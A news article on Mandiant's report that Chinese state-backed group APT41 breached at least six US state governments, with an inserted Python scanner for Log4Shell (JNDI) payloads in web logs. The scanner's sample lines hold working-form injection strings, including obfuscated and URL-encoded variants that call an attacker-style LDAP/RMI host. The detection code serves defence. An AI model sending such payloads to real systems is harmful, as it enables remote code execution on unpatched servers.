Chinese state-backed hackers breached US government agencies in six states, new threat report reveals

Reports published over the years have identified China as home to some of the most prolific hackers and hacking groups in the world. Now a new threat analysis from cybersecurity firm Mandiant reveals that a highly capable hacking group backed by the Chinese government has broken into the computer systems of at least six US state governments.

According to the Mandiant analysis (the firm previously uncovered state-sponsored intrusions into key US government agencies, including the SolarWinds supply-chain compromise), the group known as APT41 targeted US state governments between May 2021 and February 2022.

Within the breached networks Mandiant found evidence that personally identifiable information had been exfiltrated, which it says is consistent with an espionage operation.

But the company said it could not yet make a conclusive assessment of the group's objective. Overall, the analysis, published on March 8, paints a picture of a formidable adversary that constantly adapts.

The report said: “APT41’s recent activity against US state governments includes significant new capabilities, ranging from new attack vectors to post-compromise tools and technology.”

The report further states, “APT41 can quickly adapt its early access techniques by re-compromising the environment through a different vector or by rapidly operating a new vulnerability.”

According to the analysis, the group readily redeploys its capabilities through new attack vectors rather than holding them in reserve for future use.

It also found that APT41 broke into government networks by exploiting vulnerabilities in web applications built on Microsoft’s .NET platform, including a previously unknown (zero-day) vulnerability in USAHERDS, an animal health reporting application used by state governments.

On 10 December the US Cybersecurity and Infrastructure Security Agency (CISA) formally warned of a vulnerability in Log4J, a Java logging library embedded in software from many of the world’s largest technology companies, that attackers could exploit to gain access to the computers running it.

According to US officials, the vulnerable software was installed on hundreds of millions of devices around the world. Officials have been urging companies for weeks to update their software, and the White House hosted a meeting with technology executives in January of this year to address the underlying problem of software that is not secure by design.

However, according to Mandiant, the Chinese hackers began exploiting the Log4J weakness to break into two US state agencies within hours of the CISA notification.
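The Log4J weakness referred to above is the JNDI lookup flaw in Log4j 2 (CVE-2021-44228, widely known as Log4Shell): a string such as ${jndi:ldap://attacker-host/x} placed in any field the application logs (a User-Agent header, a URL path, a search parameter) made vulnerable versions fetch and load attacker-supplied code. As an added example that is not part of this article or of Mandiant's report, the following Python scans web-server access-log lines for such lookups, folding away the nested-lookup obfuscations (${${lower:j}ndi:...}, ${${env:NOPE:-j}ndi...}) and URL encoding that attackers used to slip past naive string matching. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not real traffic).
# Lines 2, 3, 4 and 6 carry Log4Shell payloads; lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:55 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:04:02 +0000] "GET /${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/b} HTTP/1.1" 404 153 "-" "curl/7.68.0"',
    '203.0.113.11 - - [10/Dec/2021:14:05:40 +0000] "GET /search?q=${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.23/c} HTTP/1.1" 200 88 "-" "x"',
    '203.0.113.13 - - [10/Dec/2021:14:06:10 +0000] "GET /price?amt=${total} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Dec/2021:14:07:31 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fd%7D HTTP/1.1" 404 153 "-" "python-requests/2.26"',
]

# An innermost Log4j lookup: ${...} with no further ${ } inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The lookup we are hunting for, once obfuscation has been folded away.
# Log4j resolves the lookup prefix case-insensitively, so "JNDI" counts too.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j would, for the forms
    attackers used to spell out "jndi" piecemeal. Anything else is left alone."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)                       # keep the target lookup intact
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()     # ${lower:J} -> j
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()     # ${upper:j} -> J
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:NOPE:-n}, ${::-d} ... yield the default value
        # when the looked-up name is unset. We assume it is unset, which is
        # exactly the bet the attacker makes, so the default is what Log4j sees.
        return body.split(":-", 1)[1]
    return m.group(0)                           # unknown lookup: leave as is


def normalize(s: str, max_passes: int = 20) -> str:
    """Fold nested obfuscation lookups inside-out until the string is stable."""
    for _ in range(max_passes):
        folded = _INNER_LOOKUP.sub(_resolve, s)
        if folded == s:
            break
        s = folded
    return s


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line containing a JNDI lookup, with the
    source IP (first field of the combined log format), the JNDI scheme
    (ldap, rmi, dns, ...) and the de-obfuscated payload."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        # Payloads were often URL-encoded; decode before folding lookups.
        normalized = normalize(unquote(line))
        m = _JNDI.search(normalized)
        if not m:
            continue
        end = normalized.find("}", m.start())
        findings.append({
            "line": lineno,
            "src_ip": line.split(" ", 1)[0],
            "scheme": m.group(1).lower(),
            "payload": normalized[m.start():end + 1],
        })
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['src_ip']} {hit['scheme']} {hit['payload']}")
```

Folding the lookups inside-out, rather than matching the literal string "jndi", is what catches the obfuscated variants; the benign template-looking value ${total} on line 5 is left alone and not flagged. Run against real logs, the scheme and payload fields give the callback host to block and hunt for, which is the indicator incident responders needed in the hours after the CISA advisory.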

Modus operandi

APT41’s activities were previously detailed in depth in a report by cybersecurity firm FireEye, which dubbed the group ‘Double Dragon’ because of its dual focus on espionage and financially motivated cybercrime.

The FireEye report details, among other things, a history of supply-chain attacks on software developers dating back to before 2014; in some documented cases APT41 inserted malicious code into video game files that legitimate distributors then sold to users.

The group’s operations eventually drew the attention of US authorities: in 2019 and 2020 the Justice Department charged five alleged APT41 members, placing them on the FBI’s Cyber Most Wanted list.

While APT41 has been linked to both financial crime and espionage, Mandiant researchers believe this recent campaign is aimed at espionage.

The latest report shows how difficult it is to keep state-sponsored hackers out of US networks even as US officials warn of the threat. It is also a reminder that, while many experts are watching for Russian cyber threats during the Ukraine conflict, other state-backed hackers continue their malicious work.

Recently, US intelligence agencies said in their annual assessment of global threats: “We assess that China presents the most widespread, most proactive and persistent cyber-espionage threat to US government and private sector networks.”

It is understood that, as the investigation progresses, the list of government agencies affected by the campaign could grow.
